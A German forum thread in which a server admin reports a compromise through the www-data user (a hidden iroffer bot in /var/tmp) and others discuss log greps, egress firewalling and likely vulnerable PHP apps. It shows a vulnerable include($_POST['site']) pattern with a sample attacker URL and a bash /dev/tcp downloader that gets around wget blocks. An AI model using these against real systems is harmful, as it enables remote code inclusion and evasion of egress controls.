www-data hacked

[tcsoft]

Hallo Leute!

Ich bin vor einigen Tagen einem Angriff auf meinen Server draufgekommen.
und zwar wurde mit dem benutzer "www-data" ein verzeichnis im tmp angelegt: /var/tmp/.,
darin befand sich das programm stats "iroffer" (iroffer.org) - so ein filesharing programmchen. in einem weiteren unterordner schon ein paar files mit insg. fast 3Gigabyte! im hintergrund lief ein prozess namens "stats 11.txt".

alle dateien wurden mit dem benutzer www-data erstellt und das lässt schließen, dass der angreifer genau über diesen Benutzer zugriff erlangte - nur weiß ich nicht wie. Ists der Webserver (lighttpd 1.4.11) oder php5 (5.1.6-0.dotdeb.2). ich tippe ja stark auf php - aber wo liegt die schwachstelle? :roll: :roll:

mfg

[mattiass]

ich tippe ja stark auf php - aber wo liegt die schwachstelle? :roll: :roll:

Anfällige Versionen eines CMS oder Boards. Bitte nutze die Suchfunktion.

[tcsoft]

Bitte nutze die Suchfunktion.

okay.....
nur dass mir die nichts nützliches bringt. weiß ja ned nach was ich suche

[mattiass]

Bitte nutze die Suchfunktion.

okay.....
nur dass mir die nichts nützliches bringt. weiß ja ned nach was ich suche

Was für CMS' laufen auf dem Server? Was für Boards? Welche Webmailer? Welche Administrations-Webfrontends? Mit deren Namen hier zu suchen, dürfte schon einige Ergebnisse bringen.

Hast Du die Logs schon nach auffällig langen Requests durchgegreppt?

[tcsoft]

cms-systeme laufen bei mir keine. auch keine boards. webmailer nur squirrelmail. admin-panels sowieso ned.

logs durchstöbern - ich hab mir die syslog, auth.log und die lighttpd-log access.log zu gemüte geführt. error.log hab ich mal ausglassen, weil da stehen sowieso elends viele einträge drin.

vll kannst du mir den grep suchausdruck sagen, der nach langen request filtert (nur ca.)?

[djcrackman]

Code: Select all

cat access.log | grep wget

Um mal ein Beispiel zu nennen.

[tcsoft]

cat access.log | grep wget

oh mann, danke dir. dass man nach wget suchen muss wusste ich ned. da gabs in der tat angriffe. vorwiegend mambo und phpbb wurde probiert, hab ich nicht installiert.

[Joe User]

Welche PHP/Perl/Python/Ruby/$interpreter-Scripte sind denn installiert?

[tcsoft]

PHP:
squirrelmail
ShowIt
phpMyAdmin
smarty

Perl:
mailgraph
postgrey
awstats

mehr fällt mir adhoc nicht ein.

[sledge0303]

Ich tippe mal auf Squirrelmail...

[lord_pinhead]

Welche Version hat awstats und ist das Tool öffentlich zugänglich oder nur nach anmeldung?

[superdreadnought]

schon mal was von iptables gehört?

[mattiass]

schon mal was von iptables gehört?

Was soll das in diesem Zusammenhang bringen?

[superdreadnought]

erstmal alle unbenötigen ports auch unter OUTPUT auf DROP => hilf ggn sein filesharing ding.
stateful inspection (nur rauslassen, was von außen auch angefordert wurde) => ggn wget

[djcrackman]

Und wenn du mal mit wget etwas ziehen willst (Patch, Archiv, etc) dann schaust du blöd - schon lange keinen so blöden Vorschlag gehört.

Entweder ich habe einen root unter Kontrolle - oder nicht, dann sollte ich aber auch die Finger davon lassen und mich nicht blindlinks auf iptables oder Sonstiges verlassen.

[superdreadnought]

was wollmer denn nu? sicherheit oder bequemlichkeit?

[mattiass]

was wollmer denn nu? sicherheit oder bequemlichkeit?

Beides! Die "iptables" helfen begrenzt. Beispielsweise kann man verhindern, dass ein von Malware geöffneter Port erreichbar ist. Das Nachladen von Schadcode per "wget" wirst Du kaum verhindern können, weil Du so auch verhinderst, dass jemand RSS-Feeds von anderen Servern zieht. Auch die meisten anderen ausgehenden Verbindungen zu sperren beeinträchtigt legitime Dienste massiv.

Also versuche bitte, konstruktiv an der Lösung des Problems mitzuwirken, anstatt hier groß den Guru rauszuhängen.

[superdreadnought]

ich lass nicht "groß den guru raushängen", sondern biete vorschläge. ich gebe zu, dasses übertrieben ist, gleich alles ausgehende zu blocken, aber wenn man es richtig macht, ist es ein mächtiges werkzeug.
erzähl mir zb. mal, wann ein webserver von sich aus irgendwas sendet ...

ich hatte auf meinem alten server mal probeweiße so krasse filter regeln drinnen und es hat funktioniert.

[mattiass]

erzähl mir zb. mal, wann ein webserver von sich aus irgendwas sendet ...

Es ist nicht ungewöhnlich, per HTTP-Request Feeds einzusammeln. Und es ist ebenfalls nicht ungewöhnlich, auf hohen Ports probeweise andere HTTPD-Instanzen zu starten.

[Joe User]

Code: Select all

#!/bin/bash

if [ $# = 0 ]; then
  echo "Usage: http-get <URL>" >&2
  exit 1
fi
URL=${1##http://} &&
SERVER=${URL%%/*} &&
FULLFILENAME=${URL#$SERVER} &&
FILENAME=${FULLFILENAME##*/}
echo -n "Fetching $SERVER$FULLFILENAME... "
(echo -e "GET $FULLFILENAME HTTP/0.9rnrn" 1>&3 &
cat 0<&3) 3<> /dev/tcp/$SERVER/80 | (
  read i
  while [ x"$(echo $i | tr -d 'r')" != "x" ]
  do
    read i
  done
  cat
) >$FILENAME
echo "done."

:roll:

[superdreadnought]

bei mir hats auf jeden fall gut funktioniert. es wär mir aber absolut neu, wenn der httpd auf nem anderen port als 80 läuft (es sei denn es ist so konfiguriert) ...

[Joe User]

es wär mir aber absolut neu, wenn der httpd auf nem anderen port als 80 läuft

Du solltest Dich mal mit HTTPS und mod_proxy beschäftigen...

[superdreadnought]

dass ssl auf 443 läuft is mir klar (wobei ich schonmal i-wie erwähnt hab, dass ich persönlich die finger von open_ssl weg lass ...) und wenn's ums proxying geht is das auch en andere sache.

[rootsvr]

Die einzige Methode mit ner Firewall sicher zu gehen ist folgende:
http://home.pages.at/heaven/absolut.htm
Per iptables alles zu verbieten ist in meinen Augen nicht spo optimal, aber wenn Du damit glücklich wirst..

ich hatte auf meinem alten server mal probeweiße so krasse filter regeln drinnen und es hat funktioniert.

"Krasse Regeln" Kenn so eine Sprache nur von Kiddies die sich gegenseitig krass aufs Maul hauen wollen..

Code: Select all

iptables -A INPUT   -j DROP 

hilft auch.. kein angreifer kommt durch *SCNR*

@Threadersteller: Welche Versionen von den Dingern hast Du drauf, Awstats im Interaktiven Modus ist angreifbar (gewesen?), Für Smarty gab es auch schon Schwachstellen, ältere Versionen von Squirrelmail hatten nen Bug.

Ansonsten bei selbsterstellter Webseite ist öfter mal ein include($_POST['site']) zu finden
was benutzt werden sollte um unterschiedliche Seiten darzustellen aber recht faszinierende Dinge macht, wenn stattdessen site=http://boeserserver.com/ganzboesescript.php genutzt wird (eigene Erfahrung)

[superdreadnought]

krass is ein deutsches wort (synonym: extrem) und weder kiddie noch hopper slang - glaub mir, so tief bin ich nicht gesunken, aber wenn du kein deutsch kannst ...

deine filterregeln sind vorallem dann gut, wenn man auf den server nur mit ssh drauf kommt ...